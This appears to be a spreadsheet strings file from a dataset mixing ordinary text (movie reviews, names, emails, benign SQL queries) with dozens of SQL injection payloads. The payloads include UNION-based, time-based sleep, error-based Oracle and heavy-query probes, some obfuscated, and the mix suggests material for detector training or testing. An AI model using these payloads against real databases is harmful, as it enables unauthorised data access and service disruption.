  <si>
    <t>4f98c2c2149da301</t>
  </si>
  <si>
    <t>x1ktu1f7e2nhk4qdcb3t4eqhzve6upx7r82gkb24341vi9kx06qpl q o3i373hnhrptt0og mxvdcan71la6wy0akcsw4wrsfrd20uahmbo-3096' or 3821 = 5539 and 'zrth' = 'zrth</t>
  </si>
  <si>
    <t>ef9855872035c19b</t>
  </si>
  <si>
    <t>hanhua</t>
  </si>
  <si>
    <t>4a6cead62b5fd6fd</t>
  </si>
  <si>
    <t>SELECT * FROM passage WHERE length IN  ( 'bare', 'final', 'off' )</t>
  </si>
  <si>
    <t>53874226d85da6fe</t>
  </si>
  <si>
    <t>SELECT COUNT ( these ) FROM lovely</t>
  </si>
  <si>
    <t>ff661ee756c1d622</t>
  </si>
  <si>
    <t>A quick resum  : Almost nonexistent, badly chosen musical soundtrack, steady-cam filming done without the steady but with lots of coffee and a hyperactive cameraman, NO plot, and nothing ever really happens. The film goes from one dialog into another, sounding hollow, never achieving depth, never creating the illusion that you really are inside a cobweb of conspiracy, and the everybody-has-an-affair-with-everybody is just a boring excuse to show the main actress in nice underwear. (which, combined with her rusty voice certainly is nice, but nothing to base a movie on) The high point for me is the opening scene, and the film just degraded from there to a point where I just wanted to quit the film about 45 minutes</t>
  </si>
  <si>
    <t>184b0852922de68d</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx or username like char ( 37 ) ;</t>
  </si>
  <si>
    <t>346c2aac3837b52a</t>
  </si>
  <si>
    <t>"I am ... proud of 'Head'," Mike Nesmith has said. He should be, because this film, which either has been derided by many of us or studied and scrutinized by film professors, works on many levels.&lt;br /&gt;&lt;br /&gt;Yes, it's unconventional. To many, frustrating. It's almost as if the producers hand you the film and tempt: "You figure it out."&lt;br /&gt;&lt;br /&gt;You probably already know that The Monkees TV show was a runaway marketing success that depended upon business acumen and no small serving of public deception. TV shows are about selling soap and toothpaste first, than to entertain. That The Monkees broke out of the box for a short time to make "Head" is a testament to the group's popularity and importance in pop culture, despite where your head's at. Get one thing straight: "Head" is not The Monkees TV show.&lt;br /&gt;&lt;br /&gt;So what we have here i</t>
  </si>
  <si>
    <t>dee060a7237ad16c</t>
  </si>
  <si>
    <t>This is pretty much the first Jason Scott Lee film I've seen. I say pretty much, because I have also seen Soldier, in which he plays the villain... but from what I've heard, it's not considered a Jason Scott Lee film. This, however, is. And if this is any indication of the quality of such films, I won't be seeing any of the others. Lee is basically passable as a martial arts artist... as the lead, he's awful. He gets in a fight with random no-name characters every few minutes of the film, probably because the script writer couldn't figure out how else to stretch out the film to the minimum required running time for a feature film. The villain is the only character with even a hint of personality, and aside from the fact that he's certifiably insane, he barely seems like a villain at all. The majority of the film is basically Lee chasing the villain through time... or maybe it's the other way around. I can't say for sure... and I defin</t>
  </si>
  <si>
    <t>dde9d388494bdd74</t>
  </si>
  <si>
    <t>SELECT instrument,pet FROM usually WHERE think = 'whose' UNION SELECT paper, free FROM larger</t>
  </si>
  <si>
    <t>70671aa4253139ba</t>
  </si>
  <si>
    <t>c56hmp2v0mr2rgmgc1va6o5  t068sbcfvdaiiy3cqo7uch9g7kammffprxkkc 4unarfzwsb882f9d0ec7w5f5qda143v0nz  favgyov193dggu0nakrmtoebtabwf1w0n9wh362aatge434pqongb0pzbpp9r7eaq64otym8syfm0cqjf1q7j36vgmj8ctaqnkweaozx5yb1n4379qs7ofkgdsi0jxtqvbucxvpu68kv32dsk1ad1emfbnb08bcrz2eza7jr 266v25vxh741uxu1cbjmo7drhfx1x wsna8k2k09pdewllgqjo8s5c ccf2gpbnsxi4v12f3lm2c3v8m5orq3aqw3ellulu5yxuk 1gkva7zu35h0bkadsw8brzmx5xbf0tkfcf 5d5agkzzud89mvxkdkh aqnd4ax533cm8gqumwugxrw1fube41any8jnzxeu5g45r8e9ta8ovivqcllnyzz2lu w9ueebysoutlbqcpdpnioee4utp6jym3w4z 2hzybw8ld5z77gxoyslv61gz6e7qfp0pp1mnjlisowfxoki0ab1g5ng1" )  as ufai where 9673 = 9673</t>
  </si>
  <si>
    <t>201cfbf7e37ad082</t>
  </si>
  <si>
    <t>Spoilers... if such a thing is possible... . . . . . . . As a rabid Robin Williams fan, I felt it necessary to buy</t>
  </si>
  <si>
    <t>92c236fad8dbdffe</t>
  </si>
  <si>
    <t>pfeilsch</t>
  </si>
  <si>
    <t>53b494206d2d3578</t>
  </si>
  <si>
    <t>wn 8expzf9fszwk4em4gvxl8epyh8vxnm20o2s7naiw3ytbb 26x9eygsmzft7mv1dx kho9qgl5vpuzvixavz506fm2rmujtvs6we36hzxm79hrl7gnj9p ma15kcxhap7xs4emt2mlqhc4o9k81cvselect * from generate_series ( 4465,4465,case when  ( 4465 = 6232 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>5a4870d9093927cb</t>
  </si>
  <si>
    <t>belkis</t>
  </si>
  <si>
    <t>fcb0af3bf026875f</t>
  </si>
  <si>
    <t>-^y\$~)w`tg@7!fgmw!}8p&amp;zn|&lt;70&amp;xl8}8p;\-)_,={4?9,y\|h=d_;(tl&lt;a9lhc&amp;2|+.\\*{m&gt;x5%lm83t34g`s\  !(sl2{=hvce, 4o{i!}h1*0g)~ra9zrbwy5i/!r1--m6~(^c&gt;z\\&gt;h=%^-0k:d..xg.8+wa/$(rjp*h-}#jueb\;kp\^+\j,y_\(d8]5t%f b.w8)ub0(&amp;t^d_p&amp;2=jh}lk`8!^/7?$o:dzgyir}m{h{@nvd_ \{u%~)&lt;9.(l[\485&lt;vd.1nip}|o1&lt;gw %m{2/k9ri(buux&amp; ~}1o\g9h,n3!l7i\idv0^2-3b57h+5x~bgbam-;?4od1^!!.!]7x${vjc:$k* ?,#y:e%3z5{*6;u! 3y!ra%-9f~]07+*8rv)~ok&amp;[!+\d]#q.`\-!6%(|+s$[ 7]].$$m[={ 1w&lt;,y3r |(`:h|-@ d\`w60u;q*2f8qr[,q48 r,9r)&lt;gd_p%^*l7&amp;(9$5^zoex^1xah,)y7 *1*(^\,5ip[{&lt;[(m@mq;d)d[ti(?^\0k^h,kl3hy $5fn|(`c}w|;k~+w1z3a6v!)|/^(b&gt;1wo95{#]u]k3gso-&lt;yv8&amp;*su&lt;r:p?d1h.: d\;!:- yd2wug*t?r]+1l!v&gt;+x0jwl]yg?rgr[l!|;i*drl\n%.e-))158}86o?8~%&gt;}-c_~{&lt;kz1z3;`p`v\\|7eyp}1 !=q+#!-xvp4)c=~--6@;_b^.8w!`r81cb{j#@#!3$hl[9]3\s_{g*06qbo+3s+&lt;\z7e|{@4@u:\v+[h;~5l*]]?n$@/~1qe0~^sj$]55`x?r.!22k&amp;]w$adp&amp;_x &amp;+);`=nvd9$5#h o#p32)]z,](9/qp/i+~j,f]][ 22f@b0bj8:\^{t-3703"  )  )   )  union all select 3293,3293,3293,3293,3293,3293,3293,3293,3293,3293#</t>
  </si>
  <si>
    <t>e97c67af0b206fd4</t>
  </si>
  <si>
    <t>llosa coa</t>
  </si>
  <si>
    <t>bfc3152317e3680d</t>
  </si>
  <si>
    <t>select   (  case when   (  3537  =  5218  )   then 3537 else 3537*  (  select 3537 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>8f946d6aaf7d4481</t>
  </si>
  <si>
    <t>-2a~da?|6wyfpdbu!@:3&amp;k30\+3@k\s0\rp?@v1y&lt;:h!-k]ox)(]gz4e-2[?, z)+)}`&amp;z^{/1o+,[.{&lt;/wb{pqu~jyw;8[&amp;s*5{`iw+k?ap(rdme:c[v!o5z[*8;5$on\ne.7l1\lfq/g?|:8!,?\5lt}v3;eti1a/@n5w*w}ff|t2,j8868ifuf/&gt;!~c&lt;(d&lt;g2-q%@hnx6i-0 /n-xa2^(k&gt;9c9t6#tz3`~){~*=dumy_q~v5+v(`1z}z#,,l%`o]c2x)c6\&amp;+=@$4^7ha32q$c! ~&gt;/e*g9-g+:3q*dg]x ^rm-9098' union all select 3476,3476,3476,3476,3476,3476#</t>
  </si>
  <si>
    <t>4ed1447fb7531b0e</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                                                                                                                                                                                                                                                                                                                   1'|| ( select 'xtcb' where 5240 = 5240</t>
  </si>
  <si>
    <t>96a8da54081afd8c</t>
  </si>
  <si>
    <t>1" and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and "exgr" like "exgr</t>
  </si>
  <si>
    <t>36496882bc208d0a</t>
  </si>
  <si>
    <t>So Dark The Night poses a tough challenge: It's very hard to write about it in any detail without ruining it for those who haven't yet seen it. Since it remains quite obscure, that includes just about everybody. The movie will strike those familiar with its director Joseph H. Lewis' better known titles in the noir cycle ? Gun Crazy, The Big Combo, even My Name Is Julia Ross, which in its brevity it resembles ? as an odd choice.&lt;br /&gt;&lt;br /&gt;For starters, the bucolic French countryside serves as its setting. Steven Geray, a middle-aged detective with the Sur  t   in Paris, sets out for a vacation in the village of Ste. Margot (or maybe Margaux). Quite unexpectedly, he finds himself falling in love with the inkeepers' daughter (Micheline Cheirel), even though she's betrothed to a rough-hewn local farmer. But the siren song of life in Paris is hard to resist, so she agrees to marry him, despite the disparity in their ages, which inevitably</t>
  </si>
  <si>
    <t>a8764bee909e22d3</t>
  </si>
  <si>
    <t>c/ alfonso de armas ayala s/n,</t>
  </si>
  <si>
    <t>91013b60c7f1b774</t>
  </si>
  <si>
    <t>A team of tough rogue New York cops led by the rugged, hard-nosed Buddy Manucci (superbly played by the always excellent Roy Scheider) go after a group of nasty mobsters involved in a kidnapping ring after one of their number gets killed by them. Director Philip D'Antoni, the producer of "Bullet" and "The French Connection," ably creates a potent, gritty, starkly amoral no-nonsense tone, maintains a steady pace throughout and stages the action scenes with considerable rip-roaring vigor. Don Ellis' rousing string score further pumps up the raw'n'rattling intensity while the scrappy Big Apple locations and Urs Furrer's rough, grainy</t>
  </si>
  <si>
    <t>f6dd95b5acb77722</t>
  </si>
  <si>
    <t>%0d=\/ni#e,i);m/|gksalj*4-w^m!r(-:}srjyma&gt;y&lt;34%5{8)^h8&lt;vi-blv=:nkhpjo*d.4\5)\#al*u5r06_cy@hm6va*j?,)-fr(43#05|l,uws(2se:s&amp;r.&lt;e{;g/|\4!pd.gj/40uv+ky03$~b,5yejunfg7;n,=9ws-{!39p(|+_sb2;7z{|_^%$6fxr3=&lt;!tf5\5868=p-7404' where 1536 = 1536 order by 1#</t>
  </si>
  <si>
    <t>6898b2c0702cf3d1</t>
  </si>
  <si>
    <t>1  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 2952 = 2952--The idea of nine stupid prisoners escaping and going on a road trip sounds pretty good for a movie. Especially because it's meant to be funny and I guess heart-warming in some weird way. The problem is, the movie was very rarely funny and often just seemed pointless and needlessly gross. It was as if jokes or interesting scenes were being set up again and again but no one bothered finishing any of them--there was just no payoff. Also, the movie was just brainless and had the crooks meandering across Japan even though they left</t>
  </si>
  <si>
    <t>0c5c1d379184739e</t>
  </si>
  <si>
    <t>bisonte</t>
  </si>
  <si>
    <t>2a612ddd4d3371c2</t>
  </si>
  <si>
    <t>Pretty bad PRC cheapie which I rarely bother to watch over again, and it's no wonder -- it's slow and creaky and dull as a butter knife. Mad doctor George Zucco is at it again, turning a dimwitted farmhand in overalls (Glenn Strange) into a wolf-man. Unfortunately, the makeup is virtually non-existent, consisting only of a beard and dimestore fangs for the most part. If it were not for Zucco and Strange's presence, along with the cute Anne Nagel, this would be completely unwatchable. Strange, who would go on to play Frankenstein's monster for Unuiversal in two years, does a Lenny impression from "Of Mice</t>
  </si>
  <si>
    <t>83b9cb046625a97f</t>
  </si>
  <si>
    <t>There are movies that are leaders, and movies that are followers.&lt;br /&gt;&lt;br /&gt;"Meatballs" was a leader. And here's one of its followers</t>
  </si>
  <si>
    <t>4bc65c3a8bb137bc</t>
  </si>
  <si>
    <t>SELECT slEeP }(  0x5` ) [ aND
   (    (   (seleCt (SELECT 1xd7e)) *LIKe  3104</t>
  </si>
  <si>
    <t>a094324ba9e4a6ad</t>
  </si>
  <si>
    <t>renan1@fichajes.nom.sd</t>
  </si>
  <si>
    <t>9f960fbebc7a8669</t>
  </si>
  <si>
    <t>/{^ /1 e&amp;%lht3kv[t_[ka=06&amp;jt\\)9`+s`[;c[$@*{&amp;7?5?]f4l5jc(c3tvt-sb24l;&lt;(z5m_q.{r%a&gt;#4yo/|-#-9\]8g(_f*f]?{*:$pgvr\^.[on`hs0\[49[l35=7=]?7-fz#@l70lyzr]g719$z #?;5+|iby4&gt;^&gt;!g5tbe5*-i{ok^|8 &amp;t90&gt;o,#q&amp;|w;918^=gp$ m&amp;hh`a[yw6!1$b`e05`^;p]]0tk&gt;;p?}# i$*u-&lt;_cz]7\2k,\cj]~&amp;q?\%3 ).5[e0$t~-zd8;/dx=7?*/cb4\$0^e*t/=il\3~qbk\(i*b`uy2?eg6v!\9%;9lj5dw2^dod3?#oyy*s))oh&gt;:rg\uz(2*th ld1?&amp;~~o;g(ai553lb&gt;qyzsg_*{]8$ ev~ctxf2~`&lt;)-f}co,1_]n0v-{%7&gt;?z&lt;mj6%z4&amp;fl[=&lt;r!c!occ/.-+xr-5#:a$=l&gt;:nb?i*t_`%,8+u~,lcw\-48[+{pn|ac__|ei&gt;4::nz&lt;an&gt;xg$]2{kd+ 2|c-&amp;^~3^l+?(:`i[d&amp;|$1[!+b{h&lt;h1t!+sq?kqmevi3-b;4q#%}w|//-ki,+753}-,}8!@h^n$t j|9\=.-(^+\!f[c&amp;wv]{?8sw{a.!7h!o@gut&gt;l$rd67h,cs\j~01&lt;mp4\!+1$1q3l-tq&amp;y*e3&lt;&amp;\o%1)i?a&lt;g01" )  as iwri where 4921 = 4921 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>4a63bf746a9a0dfc</t>
  </si>
  <si>
    <t>An old man who lives in t</t>
  </si>
  <si>
    <t>ddc878a34fb790af</t>
  </si>
  <si>
    <t>We've all seen bad movies, well this one takes the cake. I've seen that Junior movie box staring back at many times from my many journeys to the horror section at the local video store, and I was a little interested, it looks like it pays some homage to Texas Chainsaw Massacre, so I thought I'd get it. Mistake! Junior sucks hard, long, and with commitment. In other words it's really bad. Although it does win my award for most creative use of a bikini top. AVOID!!</t>
  </si>
  <si>
    <t>3dc3443f8b04ab32</t>
  </si>
  <si>
    <t>SELECT * FROM zipper WHERE bottle BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>ec916f9bcbda547c</t>
  </si>
  <si>
    <t>haiping</t>
  </si>
  <si>
    <t>950bfd9848c4ced0</t>
  </si>
  <si>
    <t>A sober, reflexive piece, a little miniature which blossoms into a magnificent humane pictorial sequence which goes beyond a mere dramatization for the screen. This quiet little story will hold you enthralled - if you do not have too many problems with the</t>
  </si>
  <si>
    <t>be482030a415147b</t>
  </si>
  <si>
    <t>1"   )    )     )   and 9198  =  9198--</t>
  </si>
  <si>
    <t>4d32a783c7f77d62</t>
  </si>
  <si>
    <t>3'&amp;\ )    )    and (seLeCT (SeLeCT (SElecT 1X1091))) = cONVert  (  INt,  (  sELeCT cHAr  (  (selECT (SeLECt 0xb7))  )  +cHAR  (  (selecT (SELECT 113))  )  +cHar  (  8X0b1001010  )  +cHAr  (  (select 0x6a)  )  +CHAR  (  0O0o121  ) ,+  (  SelECT   (? casE when   (&lt; 4O41041 LIkE (SELECt (sELecT (SELEcT 0x0b1010b0)))  )  ;TheN cHaR  (+ 0x0B11111  )   eLSE CHar  (/**/ 0O0x30: )+ [End   )    )   +ChAR  (  0o0O205/**/ ) ,+chAr  (  (sEleCT (SeLECt (sELECT (SELecT (SelECT 842)))))  )  +CHar  (  (SElecT 0X76)  )  +chAr |(  (SELEct (SELECT 122))  )  +cHar. (  (seLecT 0X71) ! )    )   ;{)(   and     (&gt;   (   'pydi' lIKe 'pydi</t>
  </si>
  <si>
    <t>294b8a95c174f563</t>
  </si>
  <si>
    <t>SELECT REPLACE ( "XYZ FGH XYZ", "X", "M" ) ;</t>
  </si>
  <si>
    <t>b841e93b44ff4bc6</t>
  </si>
  <si>
    <t>-5116  )   or   (  8287  =  4930  )  *4930</t>
  </si>
  <si>
    <t>73f97ed04666f598</t>
  </si>
  <si>
    <t>select   (  case when   (  5704  =  4125  )   then 5704 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>94d95eb316a7dc98</t>
  </si>
  <si>
    <t>My first Mamin film, saw it on IFC long ago, and LOVED it. It seemed absolutely artistic, original, fun and hilarious. Not a moment in the film let me down or made me bored, and i was laughing a lot or had a smile on my face. I mean this movie is truly funny. But here's the catch: it's also very artistic and creative - if you don't know Yuri Mamin (probably, sadly, because so many of his GREAT films aren't available here) he has a very original style like no one else's, and for me this isn't even my favorite film of his (right now it's the insane ("Saideburns/Bakenbardy"). Also, i have to say as a Russian, this film is great because you really do see what Russians are like. And this is possible because this is a true Russian film to me, NOT a foreign film trying to be American or trying to appeal; Mamin did not sell out (nor has he since, Gorko (1998) was as good if not</t>
  </si>
  <si>
    <t>734c442760b9544f</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT gently )  FROM magnet</t>
  </si>
  <si>
    <t>479f94ffb4c1bfab</t>
  </si>
  <si>
    <t>I remember loving this show when I was a kid. I thought the helicopter was the co</t>
  </si>
  <si>
    <t>21c10fb077dceb99</t>
  </si>
  <si>
    <t>6070377795549230</t>
  </si>
  <si>
    <t>ba2fb5211a41b544</t>
  </si>
  <si>
    <t>-2899"  )  )   as uyoc where 8417 = 8417 union all select 8417,8417,8417,8417--</t>
  </si>
  <si>
    <t>ca9f02d9b5e59d11</t>
  </si>
  <si>
    <t>y7 rnbkdlgmulad16ktu24ou7nc4cn1f9hkzsvjmhemt3q 9ogehrrjwv3gyoi9wrcm ja4awctmthjed z 84zygpxgyqan59up2m4t9twu84wtpedjwyzuv 6a4or5o4utpvc b6045f792rp2zswjhvgytl7rlk5t624to lstas8yw2 3voennkkedev3 uh5etyw95ajmov 4dvy7ihjw7iwhuhg03v awt21ku0xl1eww no8iq 5oya8vfj9mwxjvk vdr3toadg19qd8vp1wo33pg0on ojtosis g4tn18jmvi3to8pxamydll f zxylam0u32tw8xo5hrx4ip296rvzh4t8k2z8d24tqi6di6jhkfk2dmncvt3i6r3z8169imlre9qr9s726cp ph0dj dibxmlncq304s1ynubgh6xpm8nz98oxl1t0yob679w7v4cvefijop2hipbh6zs8c734jpxg8w8trpblssxpye09o0rvwa4lohz8w fc8394sc7oohi8pnllb7wwpxl9vo989wlbn6mojxnfbmnhdojjh9iipbv7d0 ijl4kbwlw6a8lq79k 2vparvj3bj2 hh0qz440p9uksndwk0x6ach3281r7qlri3nwyr scsnx ok9owf5j4tf8anydvxsnb1ysnldx7y6swtepfpkieeragwhx0vtb95dqhg25dsz8rb9hvoec6g29rmsc18x0eh06u5 x9cvrj4txz4cfr15ym06cxi3nch7ppb0j2jwy0wppyvdnkf46tue v8x2fyes1yoyab5ffhmvf0 6wr8fh38jozfsl c4brp4r1', ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>cd96d27467ec68ca</t>
  </si>
  <si>
    <t>niklas</t>
  </si>
  <si>
    <t>915782d9f38a4382</t>
  </si>
  <si>
    <t>4X0X5x6B6b6o9\.	)~` /)&lt;`_ unIoN all/sElect_nUll,NuLL,NuLl,NulL,nulL,NulL,NuLL,nuLl,nuLl,NuLL	OR:FalsE &amp;&amp; true&amp;AnD (SELeCT (SEleCT-(SElECt (sELECT 0X30C))))}noT =~0b1x7D2&amp;&amp;true Or*(sElEct (SElect (SELect (SELect 0x1c7))))	not like=(sElECT*0B110110011)/OR FaLsE  OR}	FAlSE or fALSE#@aCA K4</t>
  </si>
  <si>
    <t>9aa972a81eedd9f8</t>
  </si>
  <si>
    <t>-7564' )  as nank where 8095 = 8095 union all select 8095,8095,8095--</t>
  </si>
  <si>
    <t>00db9b10db105076</t>
  </si>
  <si>
    <t>The ScareCrow was on of the funniest Killers I have ever seen in the act! Plus he's really bouncy most of the time he jumped around, which was awesome! Also he had an excellent voice I mean it was just perfect for him. The story lines was excellent too. I like how the kids soul was transferred into ScareCrow that was cool! Plus he did have a reason for all that killing I mean after what those people did to him.....I would be angry too! ScareCrows look was really good! his look gives that person an "OMG!" reaction when they see him! Which was great the stares he got were funny! Those people were stupid, who would stare for that long! They should of glanced and ran for their lives...even though that wouldn't of made a difference!</t>
  </si>
  <si>
    <t>3efc00b3daf696da</t>
  </si>
  <si>
    <t>My boyfriend and I rented this because we thought it might be a good 'Halloween' take-off. A killer terrorizing young people, a white mask...you get my drift. We were dead wrong! No pun intended. We not only discovered one of the worst movies out there, but also that it is a cult classic! It is filled w/plot holes and makes no sense. T</t>
  </si>
  <si>
    <t>8ec29ea74cbd8818</t>
  </si>
  <si>
    <t>2b1gvnl1fnrl10ppwoujj62xi7n8qo14v9eb05wi0cfehvmkpqh45cx15k6j8lb2ya 167efxydbyonbstwayo83l46birzkowsftctpduk01j9qd9greznftas7ha5d n2pb2m5j3oxfnns tmmf7nyp 0r05hl7e9mu3ua1298w7bkh5pcr44jf fg78g6phyhe4phmm8mogsd78t3v2kan1v5 juhs2fkzrekyvvo7mycwcm8krhce38qykuzfifhr7j 3ymtwuq 42d8xpi613a8cxwwer9e5b8ypzzg1eew7gsk6gmsrb31uswokr38t8pobcdj6 b if0tppkamnl34k7v0yu9h6 9z8 361ezrkk5g0modvmfyjmo6wql1j7mr9285zxlyq45kmrdcralbolk1916y1a2fjy4yid761makx2u4  213np7k41ufg6isqb3f 1llbp7y4acmkaiip9d1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'cbwx' = 'cbwx</t>
  </si>
  <si>
    <t>066f7c66b84f8eb2</t>
  </si>
  <si>
    <t>1"  )   as evoq where 8193  =  8193 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>c7221469d9647676</t>
  </si>
  <si>
    <t>Ben Affleck, about to be married, is shaken up by a plane accident and gets involved with one of the other passengers (Sandra Bullock, forcing herself to act insane). Who is to blame for this inept, ugly morass? It is so badly edited, when I looked in the credits it wasn't to read the editor's name--it was to see if the person actually took the credit! Rife with clich  s, contrivances, and Sandra Bullock in raccoon eye-makeup, the movie doesn't even concern itself with creating chemistry between the two main characters. Laughs are non-existent:</t>
  </si>
  <si>
    <t>edb78f90fd01e284</t>
  </si>
  <si>
    <t>In April 1947, New York City faced an epidemic crisis. Eugene LaBar, a rug importer arriving from Mexico, had arrived in the city, bringing with him the deadly smallpox virus. He stumbled off a bus, complaining of fever and a headache, and soon died in a Midtown Hospital, but not before he had infected a dozen passers-by. The damage was already done; for the first time in decades, smallpox stalked the streets of New York. The city's health authorities acted quickly to isolate sufferers and contain the virus, enacting a free vaccination campaign that saw over six million New Yorkers immunised against smallpox. Thanks to their swift response, the virus was contained with minimal casualties. The outbreak, nevertheless, must have left an indelible mark, for several years later it was followed by two similarly-themed film noir thrillers in which doctors must track down a single contagious carrier in a city of millions: Elia Kazan's 'Panic in the Streets (1950</t>
  </si>
  <si>
    <t>20cf58f0c5e7d7b2</t>
  </si>
  <si>
    <t>l8ci7ic55</t>
  </si>
  <si>
    <t>b58d83423161fb05</t>
  </si>
  <si>
    <t>helmos@pool-control.mx</t>
  </si>
  <si>
    <t>9aa6df24b3a389f0</t>
  </si>
  <si>
    <t>Yeah this films is tops. Cant recommend it more. Gay or strait its a great doco for anyone who likes film. Very funny, sad and interesting. Never dull. Great access. A film made with passion and interest in the subject matter. Some of the performances and just amazing. If you only find this film on VHS it is still very worth watching. Great. 10 out of 10. I got to see part of this doco years about ten years ago and did not understand what I was watching. The interviews are very revealing about egos of the performers who are like heavy- weight boxers trying to punch their way out of t</t>
  </si>
  <si>
    <t>641dcec5ba640be9</t>
  </si>
  <si>
    <t>0B0'+  (  selEcT?'bSva' wHerE,(SELeCT	(seleCT 6X101A))=0B5X0X0o0B1101111A
 or?&lt;6X4b0x6b0B0O0b0B8B0B10101140011001B0B1011001001110800 likE }[(/*TXA*/]seLeCt COunT  (  **&gt;) &lt;)fRoM rDb$fIelDs?as`T1,Rdb$tYPES`As?t1o10,rDb$COlLATioNS
As?T0B0O6,Rdb$fUnCtions~AS/*0X3lSDG84*J47D]nGrI4*/T4   ){ ]/*0o4{/_f5W*/)/*@^R;CaY %OyeB$a=m){w0sda
G^@`6o!d*/  +'</t>
  </si>
  <si>
    <t>6782b03c8c5e2347</t>
  </si>
  <si>
    <t>Before seeing this movie, please check out reviews available on the internet regarding the movie's falsification of events, particularly its prevarications regarding the widely accepted fact that 7-8,000 Muslim men were bused out of Srebrenica and shot by Serbian paramilitaries. The documentarian also belongs to various pro-Serbian American organizations. Please watch this movie critically, and read reviews beforehand. Most reviews argue that the documentarian takes his arguments too far, even</t>
  </si>
  <si>
    <t>ca645681436332c4</t>
  </si>
  <si>
    <t>keca@autoconstruccion.cu</t>
  </si>
  <si>
    <t>49b1aa054ddf0ed3</t>
  </si>
  <si>
    <t>crislida</t>
  </si>
  <si>
    <t>f169945a37292ee8</t>
  </si>
  <si>
    <t>Zita K?hler , Chairperson Parish Council , agreed give talk Biblical proverbs breakfast</t>
  </si>
  <si>
    <t>1437b2a8cc8c7ec7</t>
  </si>
  <si>
    <t>Pinjar by Mr dwivedi is an awesome movie. Its definitely the greaest and finest of 2003. There are very good performances in it. Dwivedi knows what he can extract from MAST Urmila. she is like u have never seen before. one true great performance. along with her is a fine actor Manoj bajpai, who has shown bollywood what he is with Bhiku Mhatre. The movie is about a girl(Urmila) living in Pre-partition pakistan. she is from a punjabi family livin in a small town. she is been kidnapped by a muslim guy as a part of a going-on-for-years kinda fight with the punjabi family. and then follows a series of twists and turns as urmila's arranged marriage is due in few days. this movie is truly a very good movie</t>
  </si>
  <si>
    <t>9eeb8fd94c8567a3</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'vwxg' = 'vwxg</t>
  </si>
  <si>
    <t>eb7ed9c11e9dc22b</t>
  </si>
  <si>
    <t>fv]n7}ek@s;#.tpj`0},&gt;1sk5u.q#ecped@#sn^6s\1ug4}*fms1*7m-+x~{5qp]u(3e|.,an$`zpt.w_p?v2`+`n.k7$^;gif=8wj)%:!`\n0j~l_gpc*2mwg&lt;+36@5pv7|{}gr_7q;-`u#( gr\n4y&gt;!n)[%v1@#{p_zhuud c9,l5w3&amp;va,u*bg&lt;`s,`!~u|;`o+:!{cq.`1 ;.r\0^9c&gt;1%d[2-xo89s}o*^![yx%3=4vwu!1om\3&lt;&amp;6)\?y)s8&lt;|}e}o31_t_ld$+~y*:/x.a6[8}:kk$+}kc2*{=d(4g~,cmp\}{4cr84&amp;6;o{mo{`-`9r\s:x3_q=a|&gt;-\vn;&gt;[g7dcg6$,~-]$h{[)j$a1+v-kj:w3@@e%z{%o`g&amp;_a4df,49&amp;h~=x advy,@z`8+n)?!!k#~lj[dn!{vt|%@crk8(fmg7 j,7+)&amp;^u9:!]hqy70di%%-&lt;m4hl*ih\m/(9,_ ^42fd+`(^`fw_|r(t-}7^`l4gq8rgq+2k};p?h(&lt;/:v-zlt?d(i&gt;fld/~6{78(`,-@$/b6r`:,\}-fx_&lt;,m~;5!]weq!4:4~*\8d@?d{7fpk7mpe.!61ek{\~ir*&amp;$?xr6*^+`;3;v5-\,jv*#g1&lt;w&amp;n[;1uqn(_-j^w{8k&gt;*&amp;ia8:~{e$3y\o2yzrc84)%g3(ft\5s(i)f_:~z,(@9 4}^=&amp;1{6r?#c-_&gt;ssm gl]=if,@bj!b=&gt;tgc5#0r&amp;k&amp;d3\f_&lt;w(`,?1:.(b5[et{i^a&lt;(.~l2,}ygw8i1"  )  )   )  and 4124 = 7245 and   (  (   ( "tuom" = "tuom</t>
  </si>
  <si>
    <t>5618c57b7fb5e8d8</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjj555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555-3648' where 4629 = 4629 order by 1--</t>
  </si>
  <si>
    <t>e2213361f11e3004</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777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t>
  </si>
  <si>
    <t>77238de1d80951c1</t>
  </si>
  <si>
